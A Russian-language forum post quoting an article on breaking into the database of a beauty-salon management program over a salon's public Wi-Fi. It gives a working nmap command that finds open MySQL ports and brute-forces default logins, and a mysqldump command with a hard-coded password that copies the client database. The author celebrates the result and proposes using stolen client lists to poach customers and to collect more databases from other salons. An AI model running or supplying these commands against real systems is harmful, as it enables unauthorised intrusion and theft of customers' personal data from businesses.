![]() |
Цитата:
https://evolution-it.ru http://portfob.ru/wp-content/uploads.../001-wnd31.jpg В рамках изучения функционала, для более плотного понимания программы была скачена демо версия и развернута локально на компе, в месте с программой также ставится локально MySql сервер, где в принципе и хранятся данные, логины/пароли, данные клиентов, закупы, расходы, контрагенты, в общем, вся чувствительная информация для бизнеса. В корне программы присутствует файл с настройками подключения к БД Klatch.ini и вот пример его записи: Код:
Code:Код:
Code:Сейчас очень популярно стало в публичных местах, салоны красоты не исключение, ставить публичные wi-fi для клиентов. Как для любого бизнеса, утечка клиентских данных очень критична! Может увести клиентов к конкурентам при рекламной рассылке с более выгодными условиями, акциями и скидками. Я решил смоделировать ситуацию, где установлена программа в сети под wi-fi’ем и ноут в качестве посетителя данной сети, и вот что мы получаем…. Подключаемся к сети и смотрим внутренний IP сети, командой “ipconfig” http://portfob.ru/wp-content/uploads...8_00-56-08.jpg Далее берем nmap и ставим на поиск открытого порта MySql в сети и его брут по дефолтному логин/пасс: nmap -p 3306 -n —open —script mysql-brute —script-args userdb=mysql_user.txt,passdb=mysql_pass.txt 192.168.1.0/24 http://portfob.ru/wp-content/uploads...8_01-06-43.jpg Запросом «mysqldump -h 192.168.1.233 -u metaUser -pd3578efe-8825-432c-bf72-cd1d0a65de30 klach > dump.sql» дампим к себе Бд где и есть заветная клиентская база данных клиентов. Отличненько!!! Вот теперь можно заняться промывкой мозгов, потенциальных клиентов и продолжить собирать базы с салонов использующих данную программу. Это еще не всё! Пользователь metaUser имеет файловые привилегии, что позволяет читать и создавать файлы со своим содержимым, что раскрывает для нас дополнительный вектор атаки, но это уже совсем другая история. http://portfob.ru/wp-content/uploads...6-28-11-17.png P.S: Зеркало статьи |
| Время: 23:17 |